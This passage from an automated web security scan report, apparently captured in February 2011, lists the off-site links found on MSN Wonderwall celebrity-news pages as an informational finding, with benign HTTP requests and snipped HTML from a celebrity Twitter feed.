https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fhalle-berry-set-to-battle-model-ex-over-custody-1594335.story
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies/halle-berry-set-to-battle-model-ex-over-custody-1594335.story?gt1=28135 HTTP/1.1
Host: wonderwall.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 15:42:47 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 1
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <a href="http://huff.to/dOv31R">http://huff.to/dOv31R</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/32808608114671616">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23347_Module1x1_634268888500102520.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/channingtatum">channingtatum</a>: VIDEOS OF THE WEEK: Check out Chan in 2 new film clips and a behind-the-scenes featurette from ...The Eagle...... <a href="http://ow.ly/3OOBd">http://ow.ly/3OOBd</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/channingtatum/statuses/32802789788745728">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: Surprise!!! I've been keeping another secret! <a href="http://bit.ly/gO5b3F">http://bit.ly/gO5b3F</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/PerezHilton/statuses/32802397742960640">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32111_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/ramonasinger">ramonasinger</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/ramonasinger/statuses/32800833896714241">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/32798137911345152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/32797990213124097">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: 32 thank u! RT <a href="http://twitter.com/SkaredOfMee">@SkaredOfMee</a>: RT <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797701804400640">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/meka2blessed4u">@meka2blessed4u</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797550088028160">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: :) RT <a href="http://twitter.com/Diamonds214">@Diamonds214</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Ugh! Try to nap when the baby does n play Mozart n put the headphones on ur belly. ... <a href="http://tmi.me/6g1HB">http://tmi.me/6g1HB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797271749820416">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Hell to the No!! He is not quiet! RT <a href="http://twitter.com/RHWONY">@RHWONY</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32796834711732224">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25464_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/bretmichaels">bretmichaels</a>: Vote for The Bret Michaels' Rock Hard-Ride Hard Award!
<a href="http://www.supercrossonline.com/bretmichaels/">http://www.supercrossonline.com/bretmichaels/</a> <a href="http://twitter.com/supercrosslive">@supercrosslive</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/bretmichaels/statuses/32796448315678721">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/21214_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/CountessLuAnn">CountessLuAnn</a>: With Mariska Hargitay before she left the set for the SAG Awards. We could be sisters! Shooting on location for... <a href="http://fb.me/zQHk5Tm1">http://fb.me/zQHk5Tm1</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/CountessLuAnn/statuses/32790989567426560">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789790063591424">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/foodjunkie101">@foodjunkie101</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789163472330752">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Aww and I love Tampa! RT <a href="http://twitter.com/RNB_007">@RNB_007</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789035353112576">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32781771502260225">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: <a href="http://twitter.com/yerdua4">@yerdua4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32781494627864576">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: Thx 4 all the support, I hope to extend my tour and visit your city. Chicago is looking bad... get an autograohed copy <a href="http://bit.ly/fzn41j">http://bit.ly/fzn41j</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32780150873522177">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>: I'll be on Wendy Williams latr today talking The Naked Mom and romance. have you seen my book yet <a href="Http://thenakedmom.com">Http://thenakedmom.com</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32779078033473536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/brookeburke">brookeburke</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/brookeburke/statuses/32778524804775936">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/sweetieHughes">@sweetieHughes</a> loved when I did that ;) RT <a href="http://twitter.com/_michaelGAGA">@_michaelGAGA</a>: Lmfaoooo <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32776407499149312">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/1774_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/WonderwallMSN">WonderwallMSN</a>: Snooki finds her long lost rodent love: will there be 6 more weeks of winter in The Jerz or is spring on its way? <a href="http://on-msn.com/dG3a7i">http://on-msn.com/dG3a7i</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/WonderwallMSN/statuses/32772731053277184">Twitter</a>
...[SNIP]...
<li><a href="http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/?cobrand=msn&utm_source=MSN&utm_medium=MSNHP&utm_campaign=MSNCareers&ocid=xnetr1-2">Women cautious about social media and ...</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=James+Franco+class+columbia+college+hollywood&form=MSNXNM&ocid=xnetr1-5">Bing: James Franco to teach class about ...</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

17.215. http://wonderwall.msn.com/movies/kelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.msn.com
Path:	/movies/kelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story

Issue detail

The page was loaded from a URL containing a query string:

http://wonderwall.msn.com/movies/kelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story?gt1=28135

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://bit.ly/fzn41j
http://bit.ly/gO5b3F
http://del.icio.us/post?title=Actress+Kelly+McGillis+says+she+hid+her+sexuality+for+years+for+kids%27+sake&url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fkelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story
http://digg.com/submit?phase=2title=Actress+Kelly+McGillis+says+she+hid+her+sexuality+for+years+for+kids%27+sake&url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fkelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story
http://download.live.com/?sku=messenger
http://fb.me/Od4vcPhS
http://fb.me/zQHk5Tm1
http://go.microsoft.com/fwlink/?LinkId=74170
http://huff.to/dOv31R
http://insidemsn.wordpress.com/
http://microsoft.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://on-msn.com/dG3a7i
http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx
http://ow.ly/3OOBd
http://platform.twitter.com/widgets.js
http://reddit.com/submit?title=Actress+Kelly+McGillis+says+she+hid+her+sexuality+for+years+for+kids%27+sake&url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fkelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story
http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css
http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css
http://static.wonderwall.com/cache/css/1296617453/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css
http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif
http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/1774_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg
http://static.wonderwall.com/photos/Module1x1/21214_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/23347_Module1x1_634268888500102520.jpg
http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/25464_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32111_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg
http://static.wonderwall.com/photos/Module1x1/37052_Module1x1_634320697368970346.jpg
http://static.wonderwall.com/photos/Module1x1/3828_Module1x1_634057198790798033.jpg
http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg
http://static.wonderwall.com/photos/Original/37052_Original.jpg
http://thenakedmom.com/
http://tmi.me/6g1HB
http://twitter.com/BravoAndy
http://twitter.com/CountessLuAnn
http://twitter.com/CountessLuAnn/statuses/32790989567426560
http://twitter.com/Diamonds214
http://twitter.com/Jillzarin
http://twitter.com/Jillzarin/statuses/32798137911345152
http://twitter.com/KimKardashian
http://twitter.com/KimKardashian/statuses/32797990213124097
http://twitter.com/Kimzolciak
http://twitter.com/Kimzolciak/statuses/32776407499149312
http://twitter.com/Kimzolciak/statuses/32789035353112576
http://twitter.com/Kimzolciak/statuses/32789163472330752
http://twitter.com/Kimzolciak/statuses/32789790063591424
http://twitter.com/Kimzolciak/statuses/32796834711732224
http://twitter.com/Kimzolciak/statuses/32797271749820416
http://twitter.com/Kimzolciak/statuses/32797550088028160
http://twitter.com/Kimzolciak/statuses/32797701804400640
http://twitter.com/PerezHilton
http://twitter.com/PerezHilton/statuses/32802397742960640
http://twitter.com/Pilltastic
http://twitter.com/RHWONY
http://twitter.com/RNB_007
http://twitter.com/SimonvanKempen
http://twitter.com/SkaredOfMee
http://twitter.com/SonjatMorgan
http://twitter.com/WonderwallMSN
http://twitter.com/WonderwallMSN/statuses/32772731053277184
http://twitter.com/_michaelGAGA
http://twitter.com/bretmichaels
http://twitter.com/bretmichaels/statuses/32796448315678721
http://twitter.com/bretmichaels/statuses/32810341914116096
http://twitter.com/brookeburke
http://twitter.com/brookeburke/statuses/32778524804775936
http://twitter.com/brookeburke/statuses/32779078033473536
http://twitter.com/brookeburke/statuses/32780150873522177
http://twitter.com/brookeburke/statuses/32781494627864576
http://twitter.com/brookeburke/statuses/32781771502260225
http://twitter.com/channingtatum
http://twitter.com/channingtatum/statuses/32802789788745728
http://twitter.com/foodjunkie101
http://twitter.com/iamdiddy
http://twitter.com/iamdiddy/statuses/32808608114671616
http://twitter.com/iamdiddy/statuses/32810279058276352
http://twitter.com/mccordalex
http://twitter.com/mccordalex/statuses/32814304038232064
http://twitter.com/meka2blessed4u
http://twitter.com/ramonasinger
http://twitter.com/ramonasinger/statuses/32800833896714241
http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fkelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story%3Focid%3Dtwtr-utweet
http://twitter.com/supercrosslive
http://twitter.com/sweetieHughes
http://twitter.com/yerdua4
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=James+Franco+class+columbia+college+hollywood&form=MSNXNM&ocid=xnetr1-5
http://www.bing.com/search?FORM=CWWWBQ
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fkelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story
http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Actress+Kelly+McGillis+says+she+hid+her+sexuality+for+years+for+kids%27+sake&u=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fkelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story
http://www.supercrossonline.com/bretmichaels/
http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/?cobrand=msn&utm_source=MSN&utm_medium=MSNHP&utm_campaign=MSNCareers&ocid=xnetr1-2
http://www.wenn.com/
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js
https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fkelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies/kelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story?gt1=28135 HTTP/1.1
Host: wonderwall.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 15:42:48 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 1
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <a href="http://huff.to/dOv31R">http://huff.to/dOv31R</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/32808608114671616">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23347_Module1x1_634268888500102520.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/channingtatum">channingtatum</a>: VIDEOS OF THE WEEK: Check out Chan in 2 new film clips and a behind-the-scenes featurette from ...The Eagle...... <a href="http://ow.ly/3OOBd">http://ow.ly/3OOBd</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/channingtatum/statuses/32802789788745728">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: Surprise!!! I've been keeping another secret! <a href="http://bit.ly/gO5b3F">http://bit.ly/gO5b3F</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/PerezHilton/statuses/32802397742960640">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32111_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/ramonasinger">ramonasinger</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/ramonasinger/statuses/32800833896714241">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/32798137911345152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/32797990213124097">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: 32 thank u! RT <a href="http://twitter.com/SkaredOfMee">@SkaredOfMee</a>: RT <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797701804400640">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/meka2blessed4u">@meka2blessed4u</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797550088028160">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: :) RT <a href="http://twitter.com/Diamonds214">@Diamonds214</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Ugh! Try to nap when the baby does n play Mozart n put the headphones on ur belly. ... <a href="http://tmi.me/6g1HB">http://tmi.me/6g1HB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32797271749820416">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Hell to the No!! He is not quiet! RT <a href="http://twitter.com/RHWONY">@RHWONY</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32796834711732224">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25464_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/bretmichaels">bretmichaels</a>: Vote for The Bret Michaels' Rock Hard-Ride Hard Award!
<a href="http://www.supercrossonline.com/bretmichaels/">http://www.supercrossonline.com/bretmichaels/</a> <a href="http://twitter.com/supercrosslive">@supercrosslive</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/bretmichaels/statuses/32796448315678721">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/21214_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/CountessLuAnn">CountessLuAnn</a>: With Mariska Hargitay before she left the set for the SAG Awards. We could be sisters! Shooting on location for... <a href="http://fb.me/zQHk5Tm1">http://fb.me/zQHk5Tm1</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/CountessLuAnn/statuses/32790989567426560">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789790063591424">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/foodjunkie101">@foodjunkie101</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/32789163472330752">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
